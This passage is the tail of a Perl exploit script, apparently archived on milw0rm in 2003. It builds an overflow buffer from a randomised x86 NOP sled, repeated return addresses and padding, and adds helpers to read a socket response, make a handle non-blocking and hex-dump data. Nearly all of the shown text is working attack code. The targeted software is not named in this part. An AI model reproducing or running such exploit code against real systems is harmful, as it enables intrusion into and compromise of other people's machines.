GetNops(87) . 425 | 426 | "010101". 427 | $RetAddr. 428 | $IckAddr. 429 | $RetAddr. 430 | $IckAddr. 431 | "101010". 432 | 433 | "DDI!". ("\x00" x 277); 434 | 435 | return $exploit; 436 | } 437 | 438 | sub Unblock { 439 | my $fd = shift; 440 | my $flags; 441 | $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n"; 442 | fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n"; 443 | } 444 | 445 | sub GoAway { 446 | exit(0); 447 | } 448 | 449 | sub ReadResponse { 450 | my ($s) = @_; 451 | my $sel = IO::Select->new($s); 452 | my $res; 453 | my @fds = $sel->can_read(4); 454 | foreach (@fds) { $res .= <$s>; } 455 | return $res; 456 | } 457 | 458 | sub HexDump { 459 | my ($data) = @_; 460 | my @x = split(//, $data); 461 | my $cnt = 0; 462 | 463 | foreach my $h (@x) 464 | { 465 | if ($cnt > 16) 466 | { 467 | print "\n"; 468 | $cnt = 0; 469 | } 470 | 471 | printf("\\x%.2x", ord($h)); 472 | $cnt++; 473 | } 474 | print "\n"; 475 | } 476 | 477 | # thank you k2 ;) 478 | sub GetNops { 479 | my ($cnt) = @_; 480 | my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97". 481 | "\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b". 482 | "\xf5\x45\x4c"); 483 | return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]); 484 | } 485 | 486 | 487 | 488 | # milw0rm.com [2003-04-07] --------------------------------------------------------------------------------